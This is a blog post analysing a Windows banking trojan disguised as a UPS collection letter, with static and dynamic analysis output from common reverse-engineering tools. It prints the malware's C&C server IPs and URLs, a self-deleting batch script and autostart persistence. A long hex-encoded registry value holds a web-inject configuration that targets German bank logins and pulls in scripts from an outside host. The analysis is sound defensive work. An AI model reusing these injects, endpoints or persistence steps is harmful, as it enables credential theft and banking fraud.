Main • Articles • Code • Talks • About • Contact

layout: post

title: Analysis of a Windows malware

Analysis of the malware d13c9136a5c29c47aa4c750fd7b34863. If you feel like watching Pulp Fiction while reading, yeah, this is related to the fact that I did not followed a strict chronological order. Some parts are in chronological order while some are not. Some information is still missing, I'll add them later. Nevertheless, feel free to contact me :)

Control

IP addresses of the C&C servers:

113.130.65.77 (up, ONSE Telecom, South Korea)
199.71.212.78 (up, Psychz Networks, CA, USA)
211.191.168.98 (down, ONSE Telecom, South Korea)
195.250.139.10 (up, Dial Telecom, Czech Republic)
173.224.208.60 (up, Psychz Networks, CA, USA)
46.51.218.71 (up, Amazon AWS, Ireland)
89.97.55.33 (up, Fastweb, Italy)
71.89.140.153 (up, Cloud Access Net, USA)
195.111.72.46 (up, Semmelweis University, Hungary)
84.53.217.109 (up, Elcom.ru, Russia)
78.46.64.17 (down, Hetzner, Germany)

Functionality

Steal credentials from various protocols and submit them over the network

Static Analysis

% md5sum UPS_COLLECT_LETTER_N882342545.exe
d13c9136a5c29c47aa4c750fd7b34863  UPS_COLLECT_LETTER_N882342545.exe
% file UPS_COLLECT_LETTER_N882342545.exe
UPS_COLLECT_LETTER_N882342545.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% clamscan UPS_COLLECT_LETTER_N882342545.exe
UPS_COLLECT_LETTER_N882342545.exe: W32.Trojan.Yakes-23 FOUND

A quick string search does not show any useful information (wrong assumption, see below)
According to tools, the malware is not packed (wrong assumption, see below)
Compile date is 2011/03/25 which might be valid and its a GUI application though not showing any windows.
ResHacker does not show any viewable content in the resource section. PE Explorer Trial shows 3 dialog windows.

There is no visible .text section, but the binary contains two .data sections. The first .data section is the actual .text section and contains the start address.

Anti-Debugging Tricks

The malware uses several anti-debugging tricks in order to prevent successful debugging and decompression. After start, it spawns three threads. One of them raises exceptions and is sprinkled with INT 3 and INT 2D statements

Libraries

Using Dependency Walker show no promising results. Onlykernel32.dll andole32.dll are imported. Here, the information between static and dynamic analysis differ (see below).

Static Analysis on the dumped process

With help from mort (Thanks, man!) who provided the first dump, I also has been able to dump the unpacked executable using Maltrap and* IDA Pro Free 5.0*. Maltrap shows what happened after the executable is unpacked. Using IDA and setting a breakpoint to GetVolumeInformationW I have been able to dump the process (LordPE to the rescue).

PID: 464, All hooks are now in place!
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: shlwapi, flags: 00000000)
PID: 464, 0x00402290: LoadLibraryW(shlwapi)
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: gfjhgfbvmnbvkfjhgf, flags: 00000000)
PID: 464, 0x7C801DA8: LoadLibraryA/ExA(file: shlwapi, flags: 00000000)
PID: 464, 0x77E8C9B6: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Rpc\PagedBuffers) -> FAIL
PID: 464, 0x77E8C7CE: RegOpenKeyExA(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Rpc) -> SUCCESS
PID: 464, --- handle: 00000098
PID: 464, 0x77E8C885: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KB00925890.exe\RpcThreadPoolThrottle) -> FAIL
PID: 464, 0x77E8CFF1: RegOpenKeyExW(key: HKEY_LOCAL_MACHINE, subkey: Software\Policies\Microsoft\Windows NT\Rpc) -> FAIL
PID: 464, 0x77E8C735: LoadLibraryW(rpcrt4.dll)
PID: 464, 0x77E84B92: CreateFileW(file: \\.\PIPE\lsarpc, OPEN_EXISTING)
PID: 464, -- CreateFileW result - fHandle: 000000BC
PID: 464, 0x0040BAFC: GetVolumeInformationW(root: C:\) -> SUCCESS
[...]

After dumping the unpacked process's executable, some new information could be revealed:

% md5sum dumped.exe
790f602efc687586df63939e1b7edd3d  dumped.exe
% file dumped.exe
dumped.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% clamscan dumped.exe
dumped.exe: OK

The malware uses the following DLLs:

kernel32 (Quite some "suspicious" functions)
shell32 (One function to get the folder path)
shlwapi32 (Just uninteresting functions)
advapi32 (A lot of crypto stuff)

PEiD/KANAL confirms the use of RC4 crypto and SHA hashing.

The binary contains quite some interesting strings:

The raw batch script found that deletes the malware

 000000011E10   000000411E10      0   @echo off
 000000011E1F   000000411E1F      0   del /F /Q /A "%S"
 000000011E32   000000411E32      0   if exist "%S" goto R
 000000011E48   000000411E48      0   del /F /Q /A "%S"

The IP addresses of the C&C servers

000000011410   000000411410      0   http://113.130.65.77:8080/mx5/C/in/
000000011458   000000411458      0   http://199.71.212.78:8080/mx5/C/in/
0000000114A0   0000004114A0      0   http://211.191.168.98:8080/mx5/C/in/
0000000114F0   0000004114F0      0   http://195.250.139.10:8080/mx5/C/in/
000000011540   000000411540      0   http://173.224.208.60:8080/mx5/C/in/
000000011590   000000411590      0   http://46.51.218.71:8080/mx5/C/in/
0000000115D8   0000004115D8      0   http://89.97.55.33:8080/mx5/C/in/
000000011620   000000411620      0   http://71.89.140.153:8080/mx5/C/in/
000000011668   000000411668      0   http://195.111.72.46:8080/mx5/C/in/
0000000116B0   0000004116B0      0   http://84.53.217.109:8080/mx5/C/in/
0000000116F8   0000004116F8      0   http://78.46.64.17:8080/mx5/C/in/

Some XML templates to store/submit credentials, etc. Also POP3 commands

000000011774 000000411774 0 application/x-www-form-urlencoded 000000011798 000000411798 0 <![CDATA[%%.%us]]><![CDATA[%%.%us]]><![CDATA[ 000000011804 000000411804 0 ]]> 000000011818 000000411818 0 <![CDATA[%%.%us]]><![CDATA[ 00000001185C 00000041185C 0 ]]> 000000011878 000000411878 0 <![CDATA[%%u.%%u.%%u.%%u:%%u]]><![CDATA[%%.%us]]><![CDATA[ 0000000118EC 0000004118EC 0 ]]> 000000011900 000000411900 0 <![CDATA[%%u.%%u.%%u.%%u:%%u]]><![CDATA[%%.%us]]><![CDATA[ 000000011974 000000411974 0 ]]> 000000011988 000000411988 0 %u 0000000119A0 0000004119A0 0 <![CDATA[ 0000000119C0 0000004119C0 0 ]]><![CDATA[ 0000000119DC 0000004119DC 0 ]]> 0000000119F0 0000004119F0 0 <![CDATA[ 000000011A10 000000411A10 0 ]]> 000000011A20 000000411A20 0 <![CDATA[ 000000011A40 000000411A40 0 ]]> 000000011A50 000000411A50 0 <![CDATA[ 000000011A70 000000411A70 0 ]]>

USER PASS
Misc interesting information

0000000111F8 0000004111F8 0 Software\Microsoft\Windows NT\C%08X 000000011254 000000411254 0 Mozilla\Firefox\Profiles 000000011288 000000411288 0 cookies.* 00000001129C 00000041129C 0 Macromedia 0000000112BC 0000004112BC 0 firefox.exe 0000000112D4 0000004112D4 0 explorer.exe 000000011C60 000000411C60 0 Software\Microsoft\Windows NT\S%08X 000000011CEB 000000411CEB 0 sKB%08d.exe 000000011D08 000000411D08 0 Software\Microsoft\Windows\CurrentVersion\Run

Dynamic Analysis

New Processes

Process Explorer showed the following new processes on the system:

UPS_COLLECT* Malware
cmd.exe command shell
KB00925890.exe Unknown Binary

This was also seen by CaptureBAT:

"06/8/2012 14:11:6.349","process","created","C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe"
"06/8/2012 14:11:8.612","process","created","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\WINDOWS\system32\cmd.exe"
"06/8/2012 14:11:8.622","process","created","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\Documents and Settings\xxx\Application Data\KB00925890.exe"
"06/8/2012 14:11:10.4","process","terminated","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\WINDOWS\system32\cmd.exe"
"06/8/2012 14:11:10.915","process","terminated","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","C:\Documents and Settings\xxx\Application Data\KB00925890.exe"

KB00925890.exe

A quick glimpse reveals the following:

% file KB00925890.exe
KB00925890.exe: PE32 executable (GUI) Intel 80386, for MS Windows
% md5sum KB00925890.exe
d13c9136a5c29c47aa4c750fd7b34863  KB00925890.exe
% clamscan KB00925890.exe
KB00925890.exe: W32.Trojan.Yakes-23 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 1278806
Engine version: 0.97.5
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.07 MB
Data read: 0.07 MB (ratio 1.00:1)
Time: 2.905 sec (0 m 2 s)

It is just a copy of the malware saved under C:\Documents and Settings\xxx\Application Data\KB00925890.exe.

Registry

I used RegShot and CaptureBAT to record registry activity. At first, the results from RegShot, which are not as useful as I hoped.

Regshot 1.8.3-beta1V5
Comments:
Datetime:2012/7/31 07:15:01  ,  2012/7/31 07:17:27
Computer:WINVM , WINVM
Username: ,

----------------------------------
Keys added:2
----------------------------------
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\C70C7138C
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\S125D0261

----------------------------------
Values added:9
----------------------------------
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation\DisplayParams: 40 01 00 00 F0 00 00 00 00 05 00 00 00 04 00 00 60 00 00 00 60 00 00 00 24 00 00 00 24 00 00 00 20 00 00 00 4C 00 75 00 63 00 69 00 64 00 61 00 20 00 43 00 6F 00 6E 00 73 00 6F 00 6C 00 65 00 00 00 0F 00 00 D8 9D 7C A0 F8 B6 00 1E 79 DD 77 94 F8 B6 00 36 9E 41 7E 08 C9 42 7E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C4 F8 B6 00 EC EF A7 7C 01 00 00 80 00 D8 9D 7C 00 00 00 00 19 00 02 00 C0 F8 B6 00 A4 03 00 00 00 00 00 00 D8 F8 B6 00 66 F0 A7 7C 01 00 00 80 A8 63 BD 7C C8 63 BD 7C
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\efpujnemxbcs\Qrfxgbc\Znyjner\HCF_PBYYRPG_YRGGRE_A882342545.rkr: 0D 00 00 00 06 00 00 00 80 1B 2F 79 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline: 0x00000000

Set IT to online mode HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run\KB00925890.exe: ""C:\Documents and Settings\xxx\Application Data\KB00925890.exe"" Malware copy is added to autostart HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached{513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} {000214E8-0000-0000-C000-000000000046} 0x401: 01 00 00 00 35 00 37 00 20 5E AC 4A EC 6E CD 01 HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\xxx\Desktop\Malware\UPSCOLLECTLETTERN882342545.exe: "UPSCOLLECTLETTERN882342545" HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows NT\S125D0261: 3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 65 35 37 66 64 38 65 66 35 65 39 33 33 36 34 34 30 36 38 39 31 37 34 35 35 35 61 33 32 31 62 63 37 36 38 35 35 65 62 31 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 20 6F 6E 67 65 74 3D 22 31 22 20 6F 6E 70 6F 73 74 3D 22 31 22 3E 5C 2E 28 67 69 66 7C 70 6E 67 7C 6A 70 67 7C 63 73 73 7C 73 77 66 7C 69 63 6F 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 20 6F 6E 67 65 74 3D 22 31 22 20 6F 6E 70 6F 73 74 3D 22 31 22 3E 77 65 62 72 65 73 6F 75 72 63 65 5C 2E 61 78 64 3C 2F 75 72 6C 3E 3C 2F 68 74 74 70 73 68 6F 74 73 3E 3C 66 6F 72 6D 67 72 61 62 62 65 72 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 61 6F 6C 2E 63 6F 6D 2F 2E 2A 2F 6C 6F 67 69 6E 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 61 63 63 6F 75 6E 74 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 53 65 72 76 69 63 65 4C 6F 67 69 6E 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 6C 6F 67 69 6E 2E 79 61 68 6F 6F 2E 63 6F 6D 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 62 61 64 6F 6F 2E 63 6F 6D 2F 73 69 67 6E 69 6E 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 6C 6F 67 69 6E 5C 2E 6C 69 76 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 61 6F 6C 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 66 61 63 65 62 6F 6F 6B 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 67 6F 6F 67 6C 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 79 61 68 6F 6F 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 62 61 64 6F 6F 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 6C 69 76 65 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 74 77 69 74 74 65 72 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 76 6B 5C 2E 63 6F 6D 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 3E 2E 2A 3C 2F 75 72 6C 3E 3C 2F 66 6F 72 6D 67 72 61 62 62 65 72 3E 3C 72 65 64 69 72 65 63 74 73 3E 3C 72 65 64 69 72 65 63 74 3E 3C 70 61 74 74 65 72 6E 3E 6A 71 75 65 72 79 61 64 64 6F 6E 73 76 32 5C 2E 6A 73 3C 2F 70 61 74 74 65 72 6E 3E 3C 70 72 6F 63 65 73 73 2F 3E 3C 2F 72 65 64 69 72 65 63 74 3E 3C 2F 72 65 64 69 72 65 63 74 73 3E 3C 62 63 6F 6E 6E 65 63 74 3E 33 31 2E 31 38 34 2E 31 39 32 2E 31 39 35 3A 38 30 38 30 3C 2F 62 63 6F 6E 6E 65 63 74 3E 3C 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 68 74 74 70 69 6E 6A 65 63 74 3E 3C 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 62 61 6E 6B 69 6E 67 2E 70 6F 73 74 62 61 6E 6B 2E 64 65 2F 72 61 69 2F 6C 6F 67 69 2E 2A 3C 2F 75 72 6C 3E 3C 2F 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 61 63 74 69 6F 6E 73 3E 3C 6D 6F 64 69 66 79 3E 3C 70 61 74 74 65 72 6E 3E 3C 21 5B 43 44 41 54 41 5B 28 5B 5C 78 30 30 5D 2A 3F 29 3C 2F 68 65 61 64 3E 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 3E 0A 69 66 28 21 77 69 6E 64 6F 77 2E 6A 51 75 65 72 79 29 7B 0A 09 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 27 2B 27 69 70 74 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 61 6A 61 78 2E 67 6F 6F 67 6C 65 61 70 69 73 2E 63 6F 6D 2F 61 6A 61 78 2F 6C 69 62 73 2F 6A 71 75 65 72 79 2F 31 2E 37 2E 31 2F 6A 71 75 65 72 79 2E 6D 69 6E 2E 6A 73 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 7D 0A 3C 2F 73 63 72 69 70 74 3E 0A 3C 73 63 72 69 70 74 3E 0A 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 74 72 61 6E 7A 61 73 65 63 75 72 65 2E 63 6F 6D 2F 72 65 73 6F 75 72 63 65 73 2F 73 63 72 69 70 74 2F 67 65 74 2E 70 68 70 2F 64 65 6E 65 77 2F 3F 6E 61 6D 65 3D 64 65 5F 70 6F 73 74 62 61 6E 6B 5F 6C 6F 67 69 6E 34 2E 6A 73 26 6C 6F 63 61 6C 3D 27 2B 6E 65 77 20 44 61 74 65 28 29 2E 67 65 74 54 69 6D 65 28 29 2E 74 6F 53 74 72 69 6E 67 28 29 2B 27 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 68 74 74 70 69 6E 6A 65 63 74 3E 3C 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 66 69 6E 61 6E 7A 70 6F 72 74 61 6C 2E 66 69 64 75 63 69 61 2E 64 65 2F 2E 2A 2F 65 6E 74 72 79 2E 2A 72 7A 69 64 3D 58 43 2E 2A 72 7A 62 6B 3D 2E 2A 3C 2F 75 72 6C 3E 3C 75 72 6C 20 74 79 70 65 3D 22 61 6C 6C 6F 77 22 20 6F 6E 70 6F 73 74 3D 22 31 22 20 6F 6E 67 65 74 3D 22 31 22 3E 2E 2A 66 69 6E 61 6E 7A 70 6F 72 74 61 6C 2E 66 69 64 75 63 69 61 2E 64 65 2F 2E 2A 2F 70 6F 72 74 61 6C 2E 2A 3C 2F 75 72 6C 3E 3C 2F 63 6F 6E 64 69 74 69 6F 6E 73 3E 3C 61 63 74 69 6F 6E 73 3E 3C 6D 6F 64 69 66 79 3E 3C 70 61 74 74 65 72 6E 3E 3C 21 5B 43 44 41 54 41 5B 28 5B 5C 78 30 30 5D 2A 3F 29 3C 2F 68 65 61 64 3E 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 74 79 6C 65 20 74 79 70 65 3D 22 74 65 78 74 2F 63 73 73 22 3E 0A 3C 2F 73 74 79 6C 65 3E 0A 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 3E 0A 69 66 20 28 21 77 69 6E 64 6F 77 2E 6A 51 75 65 72 79 29 7B 0A 09 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 27 20 2B 20 27 69 70 74 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 61 6A 61 78 2E 67 6F 6F 67 6C 65 61 70 69 73 2E 63 6F 6D 2F 61 6A 61 78 2F 6C 69 62 73 2F 6A 71 75 65 72 79 2F 31 2E 37 2E 32 2F 6A 71 75 65 72 79 2E 6D 69 6E 2E 6A 73 22 3E 3C 2F 73 63 72 27 20 2B 20 27 69 70 74 3E 27 29 3B 0A 7D 0A 3C 2F 73 63 72 69 70 74 3E 0A 3C 73 63 72 69 70 74 3E 0A 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 27 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 73 3A 2F 2F 74 72 61 6E 7A 61 73 65 63 75 72 65 2E 63 6F 6D 2F 72 65 73 6F 75 72 63 65 73 2F 73 63 72 69 70 74 2F 67 65 74 2E 70 68 70 2F 64 65 6E 65 77 2F 3F 6E 61 6D 65 3D 64 65 5F 66 69 64 75 63 69 61 5F 6C 6F 67 69 6E 34 2E 6A 73 26 6C 6F 63 61 6C 3D 27 2B 6E 65 77 20 44 61 74 65 28 29 2E 67 65 74 54 69 6D 65 28 29 2E 74 6F 53 74 72 69 6E 67 28 29 2B 27 22 3E 3C 2F 73 63 72 27 2B 27 69 70 74 3E 27 29 3B 0A 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Sysinternals\Process Monitor\FilterDialog: 2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 4B 00 00 00 7F 00 00 00 50 03 00 00 DC 02 00 00 HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Sysinternals\Process Monitor\FilterControlColumns: 64 00 00 00 64 00 00 00 64 00 00 00 64 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

----------------------------------
Values modified:17
----------------------------------
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE: 07 00 00 00 2B 00 00 00 F0 AE 6D 0A EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE: 08 00 00 00 2C 00 00 00 D0 37 09 42 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE:0k1,120: 07 00 00 00 20 00 00 00 F0 AE 6D 0A EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_HVGBBYONE:0k1,120: 08 00 00 00 21 00 00 00 D0 37 09 42 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0D 00 00 00 59 00 00 00 D0 C1 23 25 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 0D 00 00 00 5A 00 00 00 80 1B 2F 79 EC 6E CD 01
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0E 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 60 19 08 08 AA DC CA 01 01 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 11 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 60 19 08 08 AA DC CA 01 01 00 00 00 0A 00 02 0F 00 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 03 00 00 00 04 00 00 00 05 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 04 00 00 00 01 00 00 00 03 00 00 00 05 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: 03 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1\MRUListEx: 04 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\19\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 40 00 31 00 00 00 00 00 FE 40 47 65 10 00 61 70 61 74 65 44 4E 53 00 00 28 00 03 00 04 00 EF BE FE 40 47 65 FF 40 AB 39 14 00 00 00 61 00 70 00 61 00 74 00 65 00 44 00 4E 00 53 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 31 00 00 00 00 00 FE 40 73 46 10 00 44 45 50 45 4E 44 7E 31 00 00 3A 00 03 00 04 00 EF BE FE 40 73 46 FF 40 AD 39 14 00 00 00 44 00 65 00 70 00 65 00 6E 00 64 00 65 00 6E 00 63 00 79 00 20 00 57 00 61 00 6C 00 6B 00 65 00 72 00 00 00 18 00 DC 00 00 00 E2 00 00 00 2E 00 31 00 00 00 00 00 FE 40 95 65 10 00 6E 63 00 00 1C 00 03 00 04 00 EF BE FE 40 95 65 FE 40 9A 65 14 00 00 00 6E 00 63 00 00 00 12 00 02 00 00 00 02 00 00 00 3C 00 31 00 00 00 00 00 FB 40 A8 69 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE FB 40 A8 69 FE 40 E3 59 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 02 00 00 00 3A 00 00 00 58 00 31 00 00 00 00 00 FE 40 A3 44 10 00 50 45 49 44 2D 30 7E 31 2E 39 35 2D 00 00 3C 00 03 00 04 00 EF BE FE 40 A3 44 FE 40 E3 59 14 00 00 00 50 00 45 00 69 00 44 00 2D 00 30 00 2E 00 39 00 35 00 2D 00 32 00 30 00 30 00 38 00 31 00 31 00 30 00 33 00 00 00 1C 00 02 00 00 00 1A 01 00 00 4E 00 31 00 00 00 00 00 FE 40 C6 64 10 00 50 52 4F 43 45 53 7E 32 00 00 36 00 03 00 04 00 EF BE FE 40 C6 64 FF 40 B0 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72 00 00 00 18 00 DC 00 00 00 72 00 00 00 4C 00 31 00 00 00 00 00 FE 40 93 64 10 00 50 52 4F 43 45 53 7E 31 00 00 34 00 03 00 04 00 EF BE FE 40 93 64 FF 40 B3 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 4D 00 6F 00 6E 00 69 00 74 00 6F 00 72 00 00 00 18 00 02 00 00 00 E2 00 00 00 3C 00 31 00 00 00 00 00 FE 40 15 65 10 00 52 65 67 53 68 6F 74 00 26 00 03 00 04 00 EF BE FE 40 15 65 FE 40 20 65 14 00 00 00 52 00 65 00 67 00 53 00 68 00 6F 00 74 00 00 00 16 00 02 00 00 00 72 00 00 00 4A 00 31 00 00 00 00 00 FE 40 2B 45 10 00 53 4E 49 50 50 49 7E 31 00 00 32 00 03 00 04 00 EF BE FE 40 24 45 FE 40 40 52 14 00 00 00 53 00 6E 00 69 00 70 00 70 00 69 00 6E 00 67 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 DC 00 00 00 3A 00 00 00 46 00 32 00 00 08 01 00 A9 3E 20 39 20 00 50 45 76 69 65 77 2E 65 78 65 00 00 2C 00 03 00 04 00 EF BE FE 40 05 5A FF 40 AB 39 14 00 00 00 50 00 45 00 76 00 69 00 65 00 77 00 2E 00 65 00 78 